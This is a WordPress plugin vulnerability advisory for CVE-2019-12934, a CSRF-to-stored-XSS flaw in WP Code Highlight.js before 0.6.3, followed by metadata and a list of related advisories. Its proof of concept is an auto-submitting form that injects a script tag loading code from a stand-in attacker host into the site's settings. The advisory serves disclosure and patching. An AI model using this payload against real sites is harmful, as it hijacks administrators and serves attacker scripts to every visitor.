WP Code Highlight.js < 0.6.3 – CSRF to Stored XSS | CVE 2019-12934 | Plugin Vulnerabilities

Description

Lack of CSRF checks could allow attackers to make a logged in admin create XSS payloads.

Proof of Concept

<form id="hljs" name="hljs" method="post" action="https://example.com/wp-admin/options-general.php?page=wp-code-highlight-js">
	<input type="hidden" name="hljs_location" value="local">
	<input type="hidden" name="hljs_package" value="common">
	<input type="hidden" name="hljs_theme" value="default">
	<input type="hidden" name="hljs_additional_css" value="&lt;/style&gt;&lt;script src=&quot;https://attacker.com/poc.js&quot;&gt;&lt;/script&gt;">
	<input type="hidden" name="cmd" value="hljs_save">
	<input type="submit" value="Submit">
</form>
<script>
	document.getElementById('hljs').submit();
</script>

Affects Plugins

wp-code-highlightjs

Fixed in 0.6.3

References

CVE

URL

https://zeroauth.ltd/blog/2019/07/17/cve-2019-12934-wp-code-highlightjs-wordpress-plugin-csrf-leads-to-blog-wide-injected-script-html/

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

jason0x90

Verified

No

WPVDB ID

5ad84192-2853-4a63-b49a-b4b55b13d09e

Timeline

Publicly Published

2019-07-17 (about 6 years ago)

Added

2020-07-13 (about 5 years ago)

Last Updated

2020-07-16 (about 5 years ago)

Other

Published

Title

Published

2022-10-12

Title

Shortcodes Ultimate < 5.12.1 - Stored XSS via CSRF

Published

2023-10-26

Title

Alter <= 1.0 - Cross-Site Request Forgery

Published

2023-10-06

Title

Urvanov Syntax Highlighter < 2.8.34 - Highlighting Blocks Mgt via CSRF

Published

2024-07-19

Title

WP Fast Total Search < 1.70.236 - Cross-Site Request Forgery

Published

2025-01-24

Title

WP Fast Total Search < 1.79.262 - Cross-Site Request Forgery